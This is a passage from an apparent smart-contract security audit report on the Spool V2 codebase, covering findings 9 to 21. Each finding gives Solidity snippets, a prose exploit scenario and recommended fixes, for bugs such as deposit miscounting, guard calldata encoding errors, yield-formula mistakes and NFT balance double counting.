        uint256 latestIndex = _currentIndexes[strategy];
        indexes = indexes.set(i, latestIndex);

        for (uint256 j = 0; j < amounts[i].length; j++) {
            _assetsDeposited[strategy][latestIndex][j] += amounts[i][j];
        }
    }
    return indexes;
}

Figure 9.3: The addDeposits function in spool-v2-core/StrategyRegistry.sol#L343–L361

The next time the doHardWork function is called, it will transfer the equivalent of the last deposit's amount instead of the sum of all deposits from the master wallet to the assigned strategy (figure 9.4).

function doHardWork(DoHardWorkParameterBag calldata dhwParams) external whenNotPaused {
    ...
    // Transfer deposited assets to the strategy.
    for (uint256 k; k < assetGroup.length; ++k) {
        if (_assetsDeposited[strategy][dhwIndex][k] > 0) {
            _masterWallet.transfer(
                IERC20(assetGroup[k]),
                strategy,
                _assetsDeposited[strategy][dhwIndex][k]
            );
        }
    }
    ...

Figure 9.4: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L222–L341

Exploit Scenario
Bob deploys a smart vault. One hundred deposits are made before a smart vault flush is invoked, but only the last deposit's assets are deployed to the underlying strategies, severely impacting the smart vault's performance.

Recommendations
Short term, modify the depositAssets function so that it correctly tracks all deposits within a flush cycle, rather than just the last deposit.
Long term, improve the system's unit and integration tests: test a smart vault with a single strategy and with multiple strategies to ensure that smart vaults behave correctly when funds are deposited and deployed to the underlying strategies.

+10. Risk of malformed calldata of calls to guard contracts
Severity: Low Difficulty: High
Type: Data Validation Finding ID: TOB-SPL-10
Target: managers/GuardManager.sol

Description
The GuardManager contract does not pad custom values while constructing the calldata for calls to guard contracts. The calldata could be malformed, causing the affected guard contract to give incorrect results or to always revert calls. Guards for vaults are customizable checks that are executed on every user action.
The result of a guard contract either approves or disapproves user actions. The GuardManager contract handles the logic to call guard contracts and to check their results (figure 10.1). function runGuards( address smartVaultId , RequestContext calldata context) external view { [...] bytes memory encoded = _encodeFunctionCall(smartVaultId, guard , context); ( bool success , bytes memory data) = guard.contractAddress.staticcall(encoded) ; _checkResult (success, data, guard.operator, guard.expectedValue, i); } } Figure 10.1: The runGuards function in spool-v2-core/GuardManager.sol#L19–L33 The arguments of the runGuards function include information related to the given user action and custom values defined at the time of guard definition. The GuardManager.setGuards function initializes the guards in the GuardManager contract. Using the guard definition, the GuardManager contract manually constructs the calldata with the selected values from the user action information and the custom values (figure 10.2). function _encodeFunctionCall ( address smartVaultId , GuardDefinition memory guard, RequestContext memory context) internal pure returns ( bytes memory ) { [...] result = bytes .concat(result, methodID ); for ( uint256 i ; i < paramsLength; ++i) { GuardParamType paramType = guard.methodParamTypes[i]; if (paramType == GuardParamType.DynamicCustomValue) { result = bytes .concat(result, abi.encode(paramsEndLoc)); paramsEndLoc += 32 + guard.methodParamValues[customValueIdx].length ; customValueIdx++; } else if (paramType == GuardParamType.CustomValue) { result = bytes .concat(result, guard.methodParamValues[customValueIdx]); customValueIdx++; } [...] } customValueIdx = 0 ; for ( uint256 i ; i < paramsLength; ++i) { GuardParamType paramType = guard.methodParamTypes[i]; if (paramType == GuardParamType.DynamicCustomValue) { result = bytes .concat(result, abi.encode(guard.methodParamValues[customValueIdx].length / 32 )); result = bytes .concat(result, guard.methodParamValues[customValueIdx]); customValueIdx++; } else if (paramType == GuardParamType.CustomValue) { customValueIdx++; } [...] } return result; } Figure 10.2: The _encodeFunctionCall function in spool-v2-core/GuardManager.sol#L111–L177 However, the contract concatenates the custom values without considering their lengths and required padding. If these custom values are not properly padded at the time of guard initialization, the call will receive malformed data. As a result, either of the following could happen: 1. Every call to the guard contract will always fail, and user action transactions will always revert. The smart vault using the guard will become unusable. 2. The guard contract will receive incorrect arguments and return incorrect results. Invalid user actions could be approved, and valid user actions could be rejected. Exploit Scenario Bob deploys a smart vault and creates a guard for it. The guard contract takes only one custom value as an argument. Bob created the guard definition in GuardManager without padding the custom value. Alice tries to deposit into the smart vault, and the guard contract is called for her action. The call to the guard contract fails, and the transaction reverts. The smart vault is unusable. Recommendations Short term, modify the associated code so that it verifies that custom values are properly padded before guard definitions are initialized in GuardManager.setGuards . Long term, avoid implementing low-level manipulations. 
If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly. Additionally, improve the user documentation with necessary technical details to properly use the system. +11. GuardManager does not account for all possible types when encoding guard arguments Severity: Low Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-SPL-11 Target: managers/GuardManager.sol Description While encoding arguments for guard contracts, the GuardManager contract assumes that all static types are encoded to 32 bytes. This assumption does not hold for fixed-size static arrays and structs with only static type members. As a result, guard contracts could receive incorrect arguments, leading to unintended behavior. The GuardManager._encodeFunctionCall function manually encodes arguments to call guard contracts (figure 11.1). function _encodeFunctionCall ( address smartVaultId , GuardDefinition memory guard, RequestContext memory context) internal pure returns ( bytes memory ) { bytes4 methodID = bytes4 ( keccak256 (abi.encodePacked(guard.methodSignature))); uint256 paramsLength = guard.methodParamTypes.length ; bytes memory result = new bytes ( 0 ); result = bytes .concat(result, methodID); uint16 customValueIdx = 0 ; uint256 paramsEndLoc = paramsLength * 32 ; // Loop through parameters and // - store values for simple types // - store param value location for dynamic types for ( uint256 i ; i < paramsLength; ++i) { GuardParamType paramType = guard.methodParamTypes[i]; if (paramType == GuardParamType.DynamicCustomValue) { result = bytes .concat(result, abi.encode( paramsEndLoc )); paramsEndLoc += 32 + guard.methodParamValues[customValueIdx].length; customValueIdx++; } else if (paramType == GuardParamType.CustomValue) { result = bytes .concat(result, guard.methodParamValues[customValueIdx]); customValueIdx++; } [...] } else if (paramType == GuardParamType.Assets) { result = bytes .concat(result, abi.encode( paramsEndLoc )); paramsEndLoc += 32 + context.assets.length * 32 ; } else if (paramType == GuardParamType.Tokens) { result = bytes .concat(result, abi.encode( paramsEndLoc )); paramsEndLoc += 32 + context.tokens.length * 32 ; } else { revert InvalidGuardParamType( uint256 (paramType)); } } [...] return result; } Figure 11.1: The _encodeFunctionCall function in spool-v2-core/GuardManager.sol#L111–L177 The function calculates the offset for dynamic type arguments assuming that every parameter, static or dynamic, takes exactly 32 bytes. However, fixed-length static type arrays and structs with only static type members are considered static. All static type values are encoded in-place, and static arrays and static structs could take more than 32 bytes. As a result, the calculated offset for the start of dynamic type arguments could be wrong, which would cause incorrect values for these arguments to be set, resulting in unintended behavior. For example, the guard could approve invalid user actions and reject valid user actions or revert every call. Exploit Scenario Bob deploys a smart vault and creates a guard contract that takes the custom value of a fixed-length static array type. The guard contract uses RequestContext assets. Bob correctly creates the guard definition in GuardManager , but the GuardManager._encodeFunctionCall function incorrectly encodes the arguments. The guard contract fails to decode the arguments and always reverts the execution. 
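The following minimal illustration (ours, not from the codebase) shows why the one-slot-per-parameter assumption fails: a fixed-size static array is encoded in place, one 32-byte word per element, while a dynamic array is referenced through an offset word.

function encodedLengths() external pure returns (uint256 staticLen, uint256 dynamicLen) {
    uint256[3] memory fixedArr = [uint256(1), 2, 3];
    uint256[] memory dynArr = new uint256[](3);
    // Static uint256[3]: encoded in place, 3 * 32 = 96 bytes, no offset word.
    staticLen = abi.encode(fixedArr).length; // 96
    // Dynamic uint256[]: offset word + length word + 3 elements = 160 bytes.
    dynamicLen = abi.encode(dynArr).length; // 160
}

A parameter of type uint256[3] therefore occupies three head slots, so an offset computed as 32 bytes per parameter points into the middle of its data.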
Recommendations Short term, modify the GuardManager._encodeFunctionCall function so that it considers the encoding length of the individual parameters and calculates the offsets correctly. Long term, avoid implementing low-level manipulations. If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly. +12. Use of encoded values in guard contract comparisons could lead to opposite results Severity: Low Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-SPL-12 Target: managers/GuardManager.sol Description The GuardManager contract compares the return value of a guard contract to an expected value. However, the contract uses encoded versions of these values in the comparison, which could lead to incorrect results for signed values with numerical comparison operators. The GuardManager contract calls the guard contract and validates the return value using the GuardManager._checkResult function (figure 12.1). function _checkResult ( bool success , bytes memory returnValue, bytes2 operator, bytes32 value , uint256 guardNum ) internal pure { if (!success) revert GuardError(); bool result = true ; if (operator == bytes2( "==" )) { result = abi.decode(returnValue, ( bytes32 )) == value; } else if (operator == bytes2( "<=" )) { result = abi.decode(returnValue, ( bytes32 )) <= value; } else if (operator == bytes2( ">=" )) { result = abi.decode(returnValue, ( bytes32 )) >= value; } else if (operator == bytes2( "<" )) { result = abi.decode(returnValue, ( bytes32 )) < value; } else if (operator == bytes2( ">" )) { result = abi.decode(returnValue, ( bytes32 )) > value; } else { result = abi.decode(returnValue, ( bool )); } if (!result) revert GuardFailed(guardNum); } Figure 12.1: The _checkResult function in spool-v2-core/GuardManager.sol#L80–L105 When a smart vault creator defines a guard using the GuardManager.setGuards function, they define a comparison operator and the expected value, which the GuardManager contract uses to compare with the return value of the guard contract. The comparison is performed on the first 32 bytes of the ABI-encoded return value and the expected value, which will cause issues depending on the return value type. First, the numerical comparison operators ( < , > , <= , >= ) are not well defined for bytes32 ; therefore, the contract treats encoded values with padding as uint256 values before comparing them. This way of comparing values gives incorrect results for negative values of the int type. The Solidity documentation includes the following description about the encoding of int type values: int: enc(X) is the big-endian two’s complement encoding of X, padded on the higher-order (left) side with 0xff bytes for negative X and with zero-bytes for non-negative X such that the length is 32 bytes. Figure 12.2: A description about the encoding of int type values in the Solidity documentation Because negative values are padded with 0xff and positive values with 0x00 , the encoded negative values will be considered greater than the encoded positive values. As a result, the result of the comparison will be the opposite of the expected result. Second, only the first 32 bytes of the return value are considered for comparison. This will lead to inaccurate results for return types that use more than 32 bytes to encode the value. Exploit Scenario Bob deploys a smart vault and intends to allow only users who own B NFTs to use it. B NFTs are implemented using ERC-1155. 
Bob uses the B contract as a guard with the comparison operator > and an expected value of 0 . Bob calls the function B.balanceOfBatch to fetch the NFT balance of the user. B.balanceOfBatch returns uint256[] . The first 32 bytes of the return data contain the offset into the return data, which is always nonzero. The comparison passes for every user regardless of whether they own a B NFT. As a result, every user can use Bob’s smart vault. Recommendations Short term, restrict the return value of a guard contract to a Boolean value. If that is not possible, document the limitations and risks surrounding the guard contracts. Additionally, consider manually checking new action guards with respect to these limitations. Long term, avoid implementing low-level manipulations. If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly. +13. Lack of contract existence checks on low-level calls Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-SPL-13 Target: GuardManager.sol , Swapper.sol Description The GuardManager and Swapper contracts use low-level calls without contract existence checks. If the target address is incorrect or the contract at that address is destroyed, a low-level call will still return success. The Swapper.swap function uses the address().call(...) function to swap tokens (figure 13.1). function swap ( address [] calldata tokensIn, SwapInfo[] calldata swapInfo, address [] calldata tokensOut, address receiver ) external returns ( uint256 [] memory tokenAmounts) { // Perform the swaps. for ( uint256 i ; i < swapInfo.length; ++i) { if (!exchangeAllowlist[swapInfo[i].swapTarget]) { revert ExchangeNotAllowed(swapInfo[i].swapTarget); } _approveMax(IERC20(swapInfo[i].token), swapInfo[i].swapTarget); ( bool success , bytes memory data) = swapInfo[i].swapTarget.call(swapInfo[i].swapCallData); if (!success) revert (SpoolUtils.getRevertMsg(data)); } // Return unswapped tokens. for ( uint256 i ; i < tokensIn.length; ++i) { uint256 tokenInBalance = IERC20(tokensIn[i]).balanceOf( address ( this )); if (tokenInBalance > 0 ) { IERC20(tokensIn[i]).safeTransfer(receiver, tokenInBalance); } } Figure 13.1: The swap function in spool-v2-core/Swapper.sol#L29–L45 The Solidity documentation includes the following warning: The low-level functions call, delegatecall and staticcall return true as their first return value if the account called is non-existent, as part of the design of the EVM. Account existence must be checked prior to calling if needed. Figure 13.2: The Solidity documentation details the necessity of executing existence checks before performing low-level calls. Therefore, if the swapTarget address is incorrect or the target contract has been destroyed, the execution will not revert even if the swap is not successful. We rated this finding as only a low-severity issue because the Swapper contract transfers the unswapped tokens to the receiver if a swap is not successful. However, the CompoundV2Strategy contract uses the Swapper contract to exchange COMP tokens for underlying tokens (figure 13.3). 
function _compound(
    address[] calldata tokens,
    SwapInfo[] calldata swapInfo,
    uint256[] calldata
) internal override returns (int256 compoundedYieldPercentage) {
    if (swapInfo.length > 0) {
        address[] memory markets = new address[](1);
        markets[0] = address(cToken);
        comptroller.claimComp(address(this), markets);

        uint256 compBalance = comp.balanceOf(address(this));
        if (compBalance > 0) {
            comp.safeTransfer(address(swapper), compBalance);
            address[] memory tokensIn = new address[](1);
            tokensIn[0] = address(comp);
            uint256 swappedAmount = swapper.swap(tokensIn, swapInfo, tokens, address(this))[0];

            if (swappedAmount > 0) {
                uint256 cTokenBalanceBefore = cToken.balanceOf(address(this));
                _depositToCompoundProtocol(IERC20(tokens[0]), swappedAmount);
                uint256 cTokenAmountCompounded = cToken.balanceOf(address(this)) - cTokenBalanceBefore;

                compoundedYieldPercentage = _calculateYieldPercentage(cTokenBalanceBefore, cTokenAmountCompounded);
            }
        }
    }
}

Figure 13.3: The _compound function in spool-v2-core/CompoundV2Strategy.sol

If the swap operation fails, the COMP will stay in CompoundV2Strategy. This will cause users to lose the yield they would have gotten from compounding. Because the swap operation fails silently, the "do hard worker" may not notice that yield is not compounding. As a result, users will receive less in profit than they otherwise would have. The GuardManager.runGuards function, which uses the address().staticcall() function, is also affected by this issue. However, the return value of the call is decoded, so the calls would not fail silently.

Exploit Scenario
The Spool team deploys CompoundV2Strategy with a market that gives COMP tokens to its users. While executing the doHardWork function for smart vaults using CompoundV2Strategy, the "do hard worker" sets the swapTarget address to an incorrect address. The swap operation to exchange COMP for the underlying token fails silently. The gained yield is not deposited into the market. The users receive less in profit.

Recommendations
Short term, implement a contract existence check before the low-level calls in GuardManager.runGuards and Swapper.swap.
Long term, avoid implementing low-level calls. If such calls are unavoidable, carefully review the Solidity documentation, particularly the "Warnings" section, before implementing them to ensure that they are implemented correctly.

+14. Incorrect use of exchangeRates in doHardWork
Severity: High Difficulty: Low
Type: Undefined Behavior Finding ID: TOB-SPL-14
Target: managers/StrategyRegistry.sol

Description
The StrategyRegistry contract's doHardWork function fetches the exchangeRates values for all of the tokens involved in the "do hard work" process, and then it iterates over the strategies and saves the exchangeRates values for the current strategy's tokens in the assetGroupExchangeRates variable; however, when doHardWork is called for a strategy, the exchangeRates variable rather than the assetGroupExchangeRates variable is passed, resulting in the use of incorrect exchange rates.

function doHardWork(DoHardWorkParameterBag calldata dhwParams) external whenNotPaused {
    ...
    // Get exchange rates for tokens and validate them against slippages.
    uint256[] memory exchangeRates = SpoolUtils.getExchangeRates(dhwParams.tokens, _priceFeedManager);
    for (uint256 i; i < dhwParams.tokens.length; ++i) {
        if (
            exchangeRates[i] < dhwParams.exchangeRateSlippages[i][0]
                || exchangeRates[i] > dhwParams.exchangeRateSlippages[i][1]
        ) {
            revert ExchangeRateOutOfSlippages();
        }
    }
    ...
    // Get exchange rates for this group of strategies.
    uint256 assetGroupId = IStrategy(dhwParams.strategies[i][0]).assetGroupId();
    address[] memory assetGroup = IStrategy(dhwParams.strategies[i][0]).assets();
    uint256[] memory assetGroupExchangeRates = new uint256[](assetGroup.length);

    for (uint256 j; j < assetGroup.length; ++j) {
        bool found = false;
        for (uint256 k; k < dhwParams.tokens.length; ++k) {
            if (assetGroup[j] == dhwParams.tokens[k]) {
                assetGroupExchangeRates[j] = exchangeRates[k];
                found = true;
                break;
            }
        }
    ...
    // Do the hard work on the strategy.
    DhwInfo memory dhwInfo = IStrategy(strategy).doHardWork(
        StrategyDhwParameterBag({
            swapInfo: dhwParams.swapInfo[i][j],
            compoundSwapInfo: dhwParams.compoundSwapInfo[i][j],
            slippages: dhwParams.strategySlippages[i][j],
            assetGroup: assetGroup,
            exchangeRates: exchangeRates,
            withdrawnShares: _sharesRedeemed[strategy][dhwIndex],
            masterWallet: address(_masterWallet),
            priceFeedManager: _priceFeedManager,
            baseYield: dhwParams.baseYields[i][j],
            platformFees: platformFeesMemory
        })
    );

    // Bookkeeping.
    _dhwAssetRatios[strategy] = IStrategy(strategy).assetRatio();
    _exchangeRates[strategy][dhwIndex].setValues(exchangeRates);
    ...

Figure 14.1: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L222–L341

The exchangeRates values are used by a strategy's doHardWork function to calculate the USD value of the assets to be deposited and the USD value of the assets currently deposited in the strategy. As a consequence of using exchangeRates rather than assetGroupExchangeRates, these calculations will produce incorrect values. Additionally, the _exchangeRates variable is returned by the strategyAtIndexBatch function, which is used when simulating deposits.

Exploit Scenario
Bob deploys a smart vault, and users start depositing into it. However, the first time doHardWork is called, they notice that the deposited assets and the reported USD value deposited into the strategies are incorrect. They panic and start withdrawing all of the funds.

Recommendations
Short term, replace exchangeRates with assetGroupExchangeRates in the relevant areas of doHardWork and where it sets the _exchangeRates variable.
Long term, improve the system's unit and integration tests to verify that the deposited value in a strategy is the expected amount. Additionally, when reviewing the code, look for local variables that are set but never used; this is a warning sign that problems may arise.

+15. LinearAllocationProvider could return an incorrect result
Severity: Medium Difficulty: Medium
Type: Undefined Behavior Finding ID: TOB-SPL-15
Target: providers/LinearAllocationProvider.sol

Description
The LinearAllocationProvider contract returns an incorrect result when the given smart vault has a riskTolerance value of -8, due to an incorrect literal value in the riskArray variable.

function calculateAllocation(AllocationCalculationInput calldata data)
    external
    pure
    returns (uint256[] memory)
{
    ...
    uint24[21] memory riskArray = [
        100000,
        95000,
        900000,
        ...
    ];
    ...
    uint8 riskt = uint8(data.riskTolerance + 10); // from 0 to 20
    for (uint8 i; i < data.apys.length; ++i) {
        ...
        results[i] = apy * riskArray[uint8(20 - riskt)] + risk * riskArray[uint8(riskt)];
        resSum += results[i];
    }

    uint256 resSum2;
    for (uint8 i; i < results.length; ++i) {
        results[i] = FULL_PERCENT * results[i] / resSum;
        resSum2 += results[i];
    }
    results[0] += FULL_PERCENT - resSum2;

    return results;

Figure 15.1: A snippet of the calculateAllocation function in spool-v2-core/LinearAllocationProvider.sol#L9–L67

The riskArray's third element is incorrect; this affects the computed allocation for smart vaults that have a riskTolerance value of -8 because the riskt variable would be 2, which is later used as an index into riskArray. The subexpression risk * riskArray[uint8(riskt)] is incorrect by a factor of 10.

Exploit Scenario
Bob deploys a smart vault with a riskTolerance value of -8 and an empty strategyAllocation value. The allocation between the strategies is computed on the spot using the LinearAllocationProvider contract, but the allocation is wrong.

Recommendations
Short term, replace 900000 with 90000 in the calculateAllocation function.
Long term, improve the system's unit and integration tests to catch issues such as this. Document the use and meaning of constants such as the values in riskArray; this will make it more likely that the Spool team will find these types of mistakes.

+16. Incorrect formula used for adding/subtracting two yields
Severity: Medium Difficulty: Low
Type: Undefined Behavior Finding ID: TOB-SPL-16
Target: manager/StrategyRegistry.sol, strategies/Strategy.sol

Description
The doHardWork function adds two yields with different base values to compute the given strategy's total yield, which results in the collection of fewer ecosystem fees and treasury fees. It is incorrect to add two yields that have different base values: the correct formula to compute the total yield from two consecutive yields Y1 and Y2 is Y1 + Y2 + (Y1 * Y2). The doHardWork function in the Strategy contract adds the protocol yield and the rewards yield to calculate the given strategy's total yield. The protocol yield percentage is calculated with the base value of the strategy's total assets at the start of the current "do hard work" cycle, while the rewards yield percentage is calculated with the base value of the total assets currently owned by the strategy.

dhwInfo.yieldPercentage = _getYieldPercentage(dhwParams.baseYield);
dhwInfo.yieldPercentage += _compound(dhwParams.assetGroup, dhwParams.compoundSwapInfo, dhwParams.slippages);

Figure 16.1: A snippet of the doHardWork function in spool-v2-core/Strategy.sol#L95–L96

Therefore, the total yield of the strategy is computed as less than its actual yield, and the use of this value to compute fees results in the collection of fewer fees for the platform's governance system. The same issue also affects the computation of a strategy's total yield on every "do hard work" cycle:

_stateAtDhw[strategy][dhwIndex] = StateAtDhwIndex({
    sharesMinted: uint128(dhwInfo.sharesMinted),
    totalStrategyValue: uint128(dhwInfo.valueAtDhw),
    totalSSTs: uint128(dhwInfo.totalSstsAtDhw),
    yield: int96(dhwInfo.yieldPercentage) + _stateAtDhw[strategy][dhwIndex - 1].yield, // accumulate the yield from before
    timestamp: uint32(block.timestamp)
});

Figure 16.2: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L331–L337

This value of the strategy's total yield is used to calculate the management fees for a given smart vault, which results in fewer fees paid to the smart vault owner.

Exploit Scenario
The Spool team deploys the system.
Alice deposits 1,000 tokens into a vault, which mints 1,000 strategy share tokens for the vault. On the next "do hard work" execution, the tokens earn 8% yield and 30 reward tokens from the protocol. The 30 reward tokens are then exchanged for 20 deposit tokens. At this point, the total tokens earned by the strategy are 100 and the total yield is 10%. However, the doHardWork function computes the total yield as 9.85%, which is incorrect, resulting in fewer fees collected for the platform.

Recommendations
Short term, use the correct formula to calculate a given strategy's total yield in both the Strategy contract and the StrategyRegistry contract. Note that the syncDepositsSimulate function subtracts a strategy's total yield at different "do hard work" indexes in DepositManager.sol#L322–L326 to compute the difference between the strategy's yields between two "do hard work" cycles; after this issue is fixed, that function's computation will be incorrect.
Long term, review the entire codebase to find all of the mathematical formulas used. Document these formulas, their assumptions, and their derivations to avoid the use of incorrect formulas.

+17. Smart vaults with re-registered strategies will not be usable
Severity: Low Difficulty: High
Type: Undefined Behavior Finding ID: TOB-SPL-17
Target: manager/StrategyRegistry.sol

Description
The StrategyRegistry contract does not clear the state related to a strategy when removing it. As a result, if the removed strategy is registered again, the StrategyRegistry contract will still contain the strategy's previous state, resulting in a temporary DoS of the smart vaults using it. The StrategyRegistry.registerStrategy function is used to register a strategy and to initialize the state related to it (figure 17.1). StrategyRegistry tracks the state of the strategies by their address.

function registerStrategy(address strategy) external {
    _checkRole(ROLE_SPOOL_ADMIN, msg.sender);
    if (_accessControl.hasRole(ROLE_STRATEGY, strategy)) revert StrategyAlreadyRegistered({address_: strategy});

    _accessControl.grantRole(ROLE_STRATEGY, strategy);
    _currentIndexes[strategy] = 1;
    _dhwAssetRatios[strategy] = IStrategy(strategy).assetRatio();
    _stateAtDhw[address(strategy)][0].timestamp = uint32(block.timestamp);
}

Figure 17.1: The registerStrategy function in spool-v2-core/StrategyRegistry.sol

The StrategyRegistry._removeStrategy function is used to remove a strategy by revoking its ROLE_STRATEGY role.

function _removeStrategy(address strategy) private {
    if (!_accessControl.hasRole(ROLE_STRATEGY, strategy)) revert InvalidStrategy({address_: strategy});

    _accessControl.revokeRole(ROLE_STRATEGY, strategy);
}

Figure 17.2: The _removeStrategy function in spool-v2-core/StrategyRegistry.sol

While removing a strategy, the StrategyRegistry contract does not remove the state related to that strategy. As a result, when that strategy is registered again, StrategyRegistry will contain values from the previous period. This could make the smart vaults using the strategy unusable or cause the unintended transfer of assets between other strategies and this strategy.

Exploit Scenario
Strategy S is registered. StrategyRegistry._currentIndexes[S] is equal to 1. Alice creates a smart vault X that uses strategy S. Bob deposits 1 million WETH into smart vault X. StrategyRegistry._assetsDeposited[S][1][WETH] is equal to 1 million WETH. The doHardWork function is called for strategy S. WETH is transferred from the master wallet to strategy S and is deposited into the protocol.
A Spool system admin removes strategy S upon hearing that the protocol is being exploited. However, the admin realizes that the protocol is not being exploited and re-registers strategy S. StrategyRegistry._currentIndexes[S] is set to 1. StrategyRegistry._assetsDeposited[S][1][WETH] is not set to zero and is still equal to 1 million WETH. Alice creates a new vault with strategy S. When doHardWork is called for strategy S, StrategyRegistry tries to transfer 1 million WETH to the strategy. The master wallet does not have those assets, so doHardWork fails for strategy S. The smart vault becomes unusable.

Recommendations
Short term, if re-registering strategies is an intended use case, modify the StrategyRegistry._removeStrategy function so that it clears the state related to removed strategies. If it is not an intended use case, modify the StrategyRegistry.registerStrategy function so that it verifies that newly registered strategies have not been previously registered.
Long term, properly document all intended use cases of the system and implement comprehensive tests to ensure that the system behaves as expected.

+18. Incorrect handling of partially burned NFTs results in incorrect SVT balance calculation
Severity: Low Difficulty: Medium
Type: Undefined Behavior Finding ID: TOB-SPL-18
Target: manager/SmartVaultManager.sol, SmartVault.sol

Description
The SmartVault._afterTokenTransfer function removes the given NFT ID from the SmartVault._activeUserNFTIds array even if only a fraction of the NFT is burned. As a result, the SmartVaultManager.getUserSVTBalance function, which uses SmartVault._activeUserNFTIds, will show less than the given user's actual balance. SmartVault._afterTokenTransfer is executed after every token transfer (figure 18.1).
The front end using getUserSVTBalance will show incorrect balances to users. Exploit Scenario Alice deposits assets into a smart vault and receives a D-NFT. Alice's assets are deposited to the protocols after doHardWork is called. Alice claims SVTs by burning a fraction of her D-NFT. The smart vault removes the D-NFT from _activeUserNFTIds . Alice checks her SVT balance and panics when she sees less than what she expected. She withdraws all of her assets from the system. Recommendations Short term, add a check to the _afterTokenTransfer function so that it checks the balance of the NFT that is burned and removes the NFT from _activeUserNFTIds only when the NFT is burned completely. Long term, improve the system’s unit and integration tests to extensively test view functions. +19. Transfers of D-NFTs result in double counting of SVT balance Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-SPL-19 Target: manager/SmartVaultManager.sol , SmartVault.sol Description The _activeUserNFTIds and _activeUserNFTCount variables are not updated for the sender account on the transfer of NFTs. As a result, SVTs for transferred NFTs will be counted twice, causing the system to show an incorrect SVT balance. The _afterTokenTransfer hook in the SmartVault contract is executed after every token transfer to update information about users’ active NFTs: function _afterTokenTransfer ( address , address from , address to , uint256 [] memory ids, uint256 [] memory , bytes memory ) internal override { // burn if (to == address ( 0 )) { ... return ; } // mint or transfer for ( uint256 i; i < ids.length; ++i) { _activeUserNFTIds[to][_activeUserNFTCount[to]] = ids[i]; _activeUserNFTCount[to]++; } } Figure 19.1: A snippet of the _afterTokenTransfer function in spool-v2-core/SmartVault.sol When a user transfers an NFT to another user, the function adds the NFT ID to the active NFT IDs of the receiver’s account but does not remove the ID from the active NFT IDs of the sender’s account. Additionally, the active NFT count is not updated for the sender’s account. The getUserSVTBalance function of the SmartVaultManager contract uses the SmartVault contract’s _activeUserNFTIds array to calculate a given user’s SVT balance: function getUserSVTBalance ( address smartVaultAddress , address userAddress ) external view returns ( uint256 ) { if (_accessControl.smartVaultOwner(smartVaultAddress) == userAddress) { (, uint256 ownerSVTs ,, uint256 fees ) = _simulateSync(smartVaultAddress); return ownerSVTs + fees; } uint256 currentBalance = ISmartVault(smartVaultAddress).balanceOf(userAddress); uint256 [] memory nftIds = ISmartVault(smartVaultAddress).activeUserNFTIds(userAddress); if (nftIds.length > 0 ) { currentBalance += _simulateNFTBurn(smartVaultAddress, userAddress, nftIds); } return currentBalance; } Figure 19.2: The getUserSVTBalance function in spool-v2-core/SmartVaultManager.sol Because transferred NFT IDs are active for both senders and receivers, the SVTs corresponding to the NFT IDs will be counted for both users. This double counting will keep increasing the SVT balance for users with every transfer, causing an incorrect balance to be shown to users and third-party integrators. Exploit Scenario Alice deposits assets into a smart vault and receives a D-NFT. Alice's assets are deposited into the protocols after doHardWork is called. Alice transfers the D-NFT to herself. The SmartVault contract adds the D-NFT ID to _activeUserNFTIds for Alice again. 
Alice checks her SVT balance and sees double the balance she had before. Recommendations Short term, modify the _afterTokenTransfer function so that it removes NFT IDs from the active NFT IDs for the sender’s account when users transfer D-NFTs and W-NFTs. Long term, add unit test cases for all possible user interactions to catch issues such as this. +20. Flawed loop for syncing flushes results in higher management fees Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-SPL-20 Target: manager/SmartVaultManager.sol , manager/DepositManager.sol Description The loop used to sync flush indexes in the SmartVaultManager contract computes an inflated value of the oldTotalSVTs variable, which results in higher management fees paid to the smart vault owner. The _syncSmartVault function in the SmartVaultManager contract implements a loop to process every flush index from flushIndex.toSync to flushIndex.current : while (flushIndex.toSync < flushIndex.current) { ... DepositSyncResult memory syncResult = _depositManager.syncDeposits( smartVault, [flushIndex.toSync, bag.lastDhwSynced, bag.oldTotalSVTs], strategies_, [indexes, _getPreviousDhwIndexes(smartVault, flushIndex.toSync)], tokens, bag.fees ); bag.newSVTs += syncResult.mintedSVTs; bag.feeSVTs += syncResult.feeSVTs; bag.oldTotalSVTs += bag.newSVTs; bag.lastDhwSynced = syncResult.dhwTimestamp; emit SmartVaultSynced(smartVault, flushIndex.toSync); flushIndex.toSync++; } Figure 20.1: A snippet of the _syncSmartVault function in spool-v2-core/SmartVaultManager.sol This loop adds the value of mintedSVTs to the newSVTs variables and then computes the value of oldTotalSVTs by adding newSVTs to it in every iteration. Because mintedSVTs are added in every iteration, new minted SVTs are added for each flush index multiple times when the loop is iterated more than once. The value of oldTotalSVTs is then passed to the syncDeposit function of the DepositManager contract, which uses it to compute the management fee for the smart vault. The use of the inflated value of oldTotalSVTs causes higher management fees to be paid to the smart vault owner. Exploit Scenario Alice deposits assets into a smart vault and flushes it. Before doHardWork is executed, Bob deposits assets into the same smart vault and flushes it. At this point, flushIndex.current has been increased twice for the smart vault. After the execution of doHardWork , the loop to sync the smart vault is iterated twice. As a result, a double management fee is paid to the smart vault owner, and Alice and Bob lose assets. Recommendations Short term, modify the loop so that syncResult.mintedSVTs is added to bag.oldTotalSVTs instead of bag.newSVTs . Long term, be careful when implementing accumulators in loops. Add test cases for multiple interactions to catch such issues. +21. Incorrect ghost strategy check Severity: Informational Difficulty: Medium Type: Data Validation Finding ID: TOB-SPL-21 Target: manager/StrategyRegistry.sol Description The emergencyWithdraw and redeemStrategyShares functions incorrectly check whether a strategy is a ghost strategy after checking that the strategy has a ROLE_STRATEGY role. function emergencyWithdraw( address [] calldata strategies, uint256 [][] calldata withdrawalSlippages, bool removeStrategies ) external onlyRole(ROLE_EMERGENCY_WITHDRAWAL_EXECUTOR, msg.sender ) { for ( uint256 i; i < strategies.length; ++i) { _checkRole(ROLE_STRATEGY, strategies[i]); if (strategies[i] == _ghostStrategy) { continue ; } [...] 
Figure 21.1: A snippet of the emergencyWithdraw function in spool-v2-core/StrategyRegistry.sol#L456–L465

function redeemStrategyShares(
    address[] calldata strategies,
    uint256[] calldata shares,
    uint256[][] calldata withdrawalSlippages
) external {
